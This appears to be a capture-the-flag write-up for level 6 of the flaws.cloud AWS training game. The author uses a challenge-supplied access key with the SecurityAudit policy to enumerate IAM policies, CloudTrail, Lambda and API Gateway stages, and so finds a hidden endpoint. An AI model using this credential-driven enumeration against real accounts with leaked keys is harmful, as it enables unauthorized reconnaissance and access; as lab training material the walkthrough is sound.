Level 6 – Challenge statement:
For this final challenge, you’re getting a user access key that has the SecurityAudit policy attached to it. See what else it can do and what else you might find in this AWS account.
Access key ID: AKIAJFQ6E7BY57Q3OBGA
Secret: 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
Background
flaws.cloud itself says it best:
Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS).
There are no SQL injection, XSS, buffer overflows, or many of the other vulnerabilities you might have seen before. As much as possible, these are AWS specific issues.
A series of hints are provided that will teach you how to discover the info you'll need.
If you don't want to actually run any commands, you can just keep following the hints which will give you the solution to the next level.
At the start of each level you'll learn how to avoid the problem the previous level exhibited.
Scope: Everything is run out of a single AWS account, and all challenges are sub-domains of flaws.cloud.
My approach:
This time we start with purportedly valid creds, so it seems we need to try a look for some misconfigurations to exploit.
First lets load the creds for use in the AWS CLI
$ aws configure --profile flawslevel6
AWS Access Key ID [None]: AKIAJFQ6E7BY57Q3OBGA
AWS Secret Access Key [None]: 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
Default region name [None]: us-west-2
Default output format [None]:
The AWS documentation states the following as it related to the SecurityAudit
managed policy:
Security Auditor
AWS managed policy name: SecurityAudit
Use case: This user monitors accounts for compliance with security requirements. This user can access logs and events to investigate potential security breaches or potential malicious activity.
Policy description: This policy grants permissions to view configuration data for many AWS services and to review their logs.
Interesting, I noticed a S3 bucket called flaws-log
earlier, lets see:
aws s3 ls s3://flaws-logs --profile flawslevel6
An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied
Ok, not that easy.
Other AWS services that this policy is likely related to would be CloudTrail and CloudWatch…
aws cloudtrail describe-trails --profile flawslevel6
"trailList": [
{
"IncludeGlobalServiceEvents": true,
"Name": "cloudtrail",
"S3KeyPrefix": "cloudtrail",
"TrailARN": "arn:aws:cloudtrail:us-west-2:975426262029:trail/cloudtrail",
"LogFileValidationEnabled": true,
"IsMultiRegionTrail": true,
"HasCustomEventSelectors": false,
"S3BucketName": "flaws-logs",
"HomeRegion": "us-west-2"
}
]
Indeed CouldTrail is ON, with the trail name of cloudtrail
and pushing files with the cloudtrail
prefix to the flaws-logs
bucket.
Lets see if we can list the CloudTrail events:
~$ aws cloudtrail lookup-events --profile flawslevel6
An error occurred (AccessDeniedException) when calling the LookupEvents operation: User: arn:aws:iam::975426262029:user/Level6 is not authorized to perform: cloudtrail:LookupEvents
Nopes.
Lets learn more about this user:
$ aws --profile flawslevel6 iam get-user
{
"User": {
"UserName": "Level6",
"Path": "/",
"CreateDate": "2017-02-26T23:11:16Z",
"UserId": "AIDAIRMDOSCWGLCDWOG6A",
"Arn": "arn:aws:iam::975426262029:user/Level6"
}
}
And their attached policies:
$ aws --profile flawslevel6 iam list-attached-user-policies --user-name Level6
{
"AttachedPolicies": [
{
"PolicyName": "list_apigateways",
"PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
},
{
"PolicyName": "SecurityAudit",
"PolicyArn": "arn:aws:iam::aws:policy/SecurityAudit"
}
]
}
Oh!, this user is also attached to the list_apigateways
policy.
Lets learn more about this policy:
aws --profile flawslevel6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
{
"Policy": {
"PolicyName": "list_apigateways",
"Description": "List apigateways",
"CreateDate": "2017-02-20T01:45:17Z",
"AttachmentCount": 1,
"IsAttachable": true,
"PolicyId": "ANPAIRLWTQMGKCSPGTAIO",
"DefaultVersionId": "v4",
"Path": "/",
"Arn": "arn:aws:iam::975426262029:policy/list_apigateways",
"UpdateDate": "2017-02-20T01:48:17Z"
}
}
Now that we have the ARN and the version id – we can get the meat of this policy:
$ aws --profile flawslevel6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
{
"PolicyVersion": {
"CreateDate": "2017-02-20T01:48:17Z",
"VersionId": "v4",
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"apigateway:GET"
],
"Resource": "arn:aws:apigateway:us-west-2::/restapis/*",
"Effect": "Allow"
}
]
},
"IsDefaultVersion": true
}
}
Now we know that this user is allowed to use the action GET
with the resource arn:aws:apigateway:us-west-2::/restapis/*
API Gateway is typically used in conjunction with Lambda functions, lets see if we can see any:
$ aws --region us-west-2 --profile flawslevel6 lambda list-functions
{
"Functions": [
{
"TracingConfig": {
"Mode": "PassThrough"
},
"Version": "$LATEST",
"CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
"FunctionName": "Level6",
"MemorySize": 128,
"CodeSize": 282,
"FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
"Handler": "lambda_function.lambda_handler",
"Role": "arn:aws:iam::975426262029:role/service-role/Level6",
"Timeout": 3,
"LastModified": "2017-02-27T00:24:36.054+0000",
"Runtime": "python2.7",
"Description": "A starter AWS Lambda function."
}
]
}
There is one! Called Level6
– lets look into the policy:
aws --region us-west-2 --profile flawslevel6 lambda get-policy --function-name Level6
{
"Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}"
}
Interesting info, we can executearn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\
and s33ppypa75
is a rest-api-id
To get the full path we’ll need the stage name:
aws --profile flawslevel6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
{
"item": [
{
"stageName": "Prod",
"cacheClusterEnabled": false,
"cacheClusterStatus": "NOT_AVAILABLE",
"deploymentId": "8gppiv",
"lastUpdatedDate": 1488155168,
"createdDate": 1488155168,
"methodSettings": {}
}
]
}
Stage name is: Prod
So we have all the pieces to complete the format: https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stage-name>/<lambda function>
Therefore, we can access the endpoint here: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
If we browse there we get the following output:
"Go to http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/"
Done!
Level 6 complete.